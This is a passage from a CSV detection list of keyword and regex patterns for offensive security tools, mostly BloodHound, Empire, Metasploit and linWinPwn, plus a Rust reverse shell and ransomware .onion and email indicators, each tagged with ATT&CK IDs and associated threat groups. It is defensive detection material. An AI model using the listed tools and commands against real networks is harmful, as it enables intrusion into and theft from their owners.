- Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36057"
"*blogonpasswords*",".{0,1000}blogonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36058"
"*blogvl7tjyjvsfthobttze52w36wwiz34hrfcmorgvdzb6hikucb7aqd.onion*",".{0,1000}blogvl7tjyjvsfthobttze52w36wwiz34hrfcmorgvdzb6hikucb7aqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36059"
"*blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion*",".{0,1000}blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36060"
"*bloodhound &> /dev/null &*",".{0,1000}bloodhound\s\&\>\s\/dev\/null\s\&.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36061"
"*bloodhound --no-sandbox*",".{0,1000}bloodhound\s\-\-no\-sandbox.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36062"
"*BloodHound ZIP File identified, extracting*",".{0,1000}BloodHound\sZIP\sFile\sidentified,\sextracting.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","36063"
"*BloodHound-*.zip*",".{0,1000}BloodHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36064"
"*bloodhound.ad.*",".{0,1000}bloodhound\.ad\..{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36065"
"*bloodhound.bin*",".{0,1000}bloodhound\.bin.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36066"
"*bloodhound.enumeration*",".{0,1000}bloodhound\.enumeration.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36067"
"*BloodHound.ps1*",".{0,1000}BloodHound\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","36068"
"*bloodhound.py *",".{0,1000}bloodhound\.py\s.{0,1000}","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36069"
"*bloodhound.py*",".{0,1000}bloodhound\.py.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36070"
"*bloodhound.rb*",".{0,1000}bloodhound\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36071"
"*bloodhound_output*/dev/null*",".{0,1000}bloodhound_output.{0,1000}\/dev\/null.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","36072"
"*bloodhound_output_*.txt*",".{0,1000}bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","36073"
"*bloodhound_output_dconly_*",".{0,1000}bloodhound_output_dconly_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","36074"
"*BloodHound3.ps1*",".{0,1000}BloodHound3\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","36075"
"*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36076"
"*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","36077"
"*BloodHoundAD/BloodHound*",".{0,1000}BloodHoundAD\/BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36078"
"*BloodHound-darwin-x64.zip*",".{0,1000}BloodHound\-darwin\-x64\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","#linux","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36079"
"*BloodHoundGraphToGoFetchPath*",".{0,1000}BloodHoundGraphToGoFetchPath.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","36080"
"*bloodhound-import -du neo4j -dp *.json*",".{0,1000}bloodhound\-import\s\-du\sneo4j\s\-dp\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36081"
"*BloodHound-linux-arm64.zip*",".{0,1000}BloodHound\-linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","#linux","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36082"
"*BloodHoundLoopResults.zip*",".{0,1000}BloodHoundLoopResults\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","36083"
"*BloodHound-master*",".{0,1000}BloodHound\-master.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36084"
"*BloodHound-modified.ps1*",".{0,1000}BloodHound\-modified\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","36085"
"*bloodhound-python*",".{0,1000}bloodhound\-python.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36086"
"*bloodhound-quickwin -u * -p *",".{0,1000}bloodhound\-quickwin\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36087"
"*bloodhound-quickwin-main*",".{0,1000}bloodhound\-quickwin\-main.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","36088"
"*BloodHound-win32-ia32.zip*",".{0,1000}BloodHound\-win32\-ia32\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36089"
"*BloodHound-win32-x64.zip*",".{0,1000}BloodHound\-win32\-x64\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36090"
"*BloodSecurity Hackers Shell*",".{0,1000}BloodSecurity\sHackers\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","36091"
"*bloodyAD -*",".{0,1000}bloodyAD\s\-.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","36092"
"*bloodyAD.py*",".{0,1000}bloodyAD\.py.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","36093"
"*bloodyAD-main*",".{0,1000}bloodyAD\-main.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","36094"
"*bluecrap@my.com*",".{0,1000}bluecrap\@my\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36095"
"*BlWasp/rs-shell*",".{0,1000}BlWasp\/rs\-shell.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","36097"
"*BlWasp/syscalls-rs.git*",".{0,1000}BlWasp\/syscalls\-rs\.git.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","1","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","36098"
